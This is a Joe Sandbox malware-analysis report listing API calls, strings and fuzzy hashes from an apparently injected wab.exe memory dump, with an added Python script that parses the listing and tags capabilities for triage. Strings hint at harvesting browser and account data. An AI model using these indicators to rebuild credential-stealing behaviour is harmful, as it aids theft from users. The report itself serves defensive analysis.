                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: EnumNamesResource
                    • String ID:
                    • API String ID: 3334572018-0
                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                    APIs
                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                    APIs
                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                    • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                    • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                    • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                    • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                    APIs
                    • memset.MSVCRT ref: 004095FC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                      • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                      • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                    • String ID:
                    • API String ID: 3655998216-0
                    • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                    • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                    APIs
                    • memset.MSVCRT ref: 00445426
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                    • String ID:
                    • API String ID: 1828521557-0
                    • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                    • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                    APIs
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                    • memcpy.MSVCRT ref: 00406942
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@FilePointermemcpy
                    • String ID:
                    • API String ID: 609303285-0
                    • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                    • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp
                    • String ID:
                    • API String ID: 2081463915-0
                    • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                    • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                    APIs
                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$CloseCreateErrorHandleLastRead
                    • String ID:
                    • API String ID: 2136311172-0
                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                    APIs
                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@
                    • String ID:
                    • API String ID: 1936579350-0
                    • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                    • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                    APIs
                    • EmptyClipboard.USER32 ref: 004098EC
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                    • GlobalFix.KERNEL32(00000000), ref: 00409927
                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                    • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                    • GetLastError.KERNEL32 ref: 0040995D
                    • CloseHandle.KERNEL32(?), ref: 00409969
                    • GetLastError.KERNEL32 ref: 00409974
                    • CloseClipboard.USER32 ref: 0040997D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                    • String ID:
                    • API String ID: 2565263379-0
                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                    APIs
                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressFreeLoadMessageProc
                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                    • API String ID: 2780580303-317687271
                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                    APIs
                    • EmptyClipboard.USER32 ref: 00409882
                    • wcslen.MSVCRT ref: 0040988F
                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                    • GlobalFix.KERNEL32(00000000), ref: 004098AC
                    • memcpy.MSVCRT ref: 004098B5
                    • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                    • CloseClipboard.USER32 ref: 004098D7
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                    • String ID:
                    • API String ID: 2014503067-0
                    • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                    • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
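The two clipboard blocks above (EmptyClipboard, then GlobalAlloc/GlobalFix, then SetClipboardData with 0000000D = CF_UNICODETEXT, then CloseClipboard; once filled from a file via ReadFile, once from a string via memcpy) are typical of what a triager wants to pull out of a listing like this, but the report format has to be parsed first. The script below is an added example, not Joe Sandbox code and not part of this report: it parses function blocks in the listing format shown on this page (the bulleted API lines with their `ref:` addresses, the indented `Part of subcall function` lines, and the `Similarity` fields up to `Instruction Fuzzy Hash`, which closes each block) and tags every function with coarse capabilities. The tag names and the matching rules are assumptions of mine, and the sample input is constructed from lines of the same shape as those above, with some hash fields dropped.

```python
# Added example: parser and capability tagger for Joe Sandbox "IDA Plugin"
# function blocks. Not part of the report; rules and tag names are assumptions.
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample in the shape of the listing above (three function blocks,
# hash fields reduced to the one this parser keys on).
SAMPLE = r"""
APIs
• EmptyClipboard.USER32 ref: 00409882
• wcslen.MSVCRT ref: 0040988F
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
• GlobalFix.KERNEL32(00000000), ref: 004098AC
• memcpy.MSVCRT ref: 004098B5
• GlobalUnWire.KERNEL32(00000000), ref: 004098BE
• SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
• CloseClipboard.USER32 ref: 004098D7
Memory Dump Source
• Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
• String ID:
• API String ID: 2014503067-0
• Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
APIs
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
Memory Dump Source
• Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$FileModuleName
• API String ID: 3859505661-0
• Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
APIs
• RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
Memory Dump Source
• Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Open
• API String ID: 71445658-0
• Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
"""

# One API line: optional "Part of subcall function XXXXXXXX: ", then
# Name.MODULE, optional "(args)", then ", ref: XXXXXXXX".
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[\w?@]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
# Any other "• Key: value" line of the block (Source File, API ID, hashes, ...).
FIELD_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?): ?(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                       # call-site address inside the dump
    subcall_of: str | None = None  # set for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)


def parse_blocks(text: str) -> list[FunctionRecord]:
    """Split the listing into one record per function; a block ends at its
    'Instruction Fuzzy Hash' line, which is the last field Joe Sandbox prints."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = API_LINE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            cur.calls.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
            continue
        m = FIELD_LINE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"].strip()
            if m["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    if cur.calls or cur.fields:
        records.append(cur)
    return records


CF_UNICODETEXT = "0000000D"  # SetClipboardData format argument seen in the listing
PSAPI_NAMES = {"EnumProcesses", "EnumProcessModules",
               "GetModuleFileNameExW", "GetModuleInformation"}


def tag_record(rec: FunctionRecord) -> set[str]:
    """Assumed capability rules keyed on API name plus the decoded arguments."""
    tags: set[str] = set()
    for c in rec.calls:
        if c.name == "SetClipboardData" and c.args[:1] == [CF_UNICODETEXT]:
            tags.add("clipboard-write-text")
        if c.name == "GetProcAddress" and len(c.args) > 1 and c.args[1] in PSAPI_NAMES:
            tags.add("dynamic-psapi-resolve")
        if c.name == "RegOpenKeyExW" and any("Shell Folders" in a for a in c.args):
            tags.add("shell-folders-lookup")
        if c.name in {"GetPrivateProfileIntW", "WritePrivateProfileStringW"}:
            tags.add("ini-settings")
        if c.name in {"CreateFileW", "ReadFile", "WriteFile"}:
            tags.add("file-io")
    return tags


def triage(text: str) -> dict[str, set[str]]:
    """Map each function, keyed by its Instruction Fuzzy Hash, to its tags."""
    return {rec.fields.get("Instruction Fuzzy Hash", "?"): tag_record(rec)
            for rec in parse_blocks(text)}


if __name__ == "__main__":
    for key, tags in triage(SAMPLE).items():
        print(key[:16], sorted(tags))
```

The Instruction Fuzzy Hash is used as the record key because it is the one field that stays stable across the dump offsets of different runs, which is also what makes it usable as a pivot when comparing this wab.exe payload against other Remcos samples.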
                    APIs
                    • GetLastError.KERNEL32 ref: 004182D7
                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                    • LocalFree.KERNEL32(?), ref: 00418342
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                    • String ID: OsError 0x%x (%u)
                    • API String ID: 403622227-2664311388
                    APIs
                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                    • OpenClipboard.USER32(?), ref: 00411878
                    • GetLastError.KERNEL32 ref: 0041188D
                    • DeleteFileW.KERNEL32(?), ref: 004118AC
                      • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                      • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                      • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                      • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                      • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                      • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                      • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                      • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                      • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                    • String ID:
                    • API String ID: 1203541146-0
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@memcpymemset
                    • String ID:
                    • API String ID: 1865533344-0
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Version
                    • String ID:
                    • API String ID: 1889659487-0
                    APIs
                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: NtdllProc_Window
                    • String ID:
                    • API String ID: 4255912815-0
                    APIs
                    • _wcsicmp.MSVCRT ref: 004022A6
                    • _wcsicmp.MSVCRT ref: 004022D7
                    • _wcsicmp.MSVCRT ref: 00402305
                    • _wcsicmp.MSVCRT ref: 00402333
                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                    • memset.MSVCRT ref: 0040265F
                    • memcpy.MSVCRT ref: 0040269B
                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                    • memcpy.MSVCRT ref: 004026FF
                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                    • API String ID: 577499730-1134094380
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
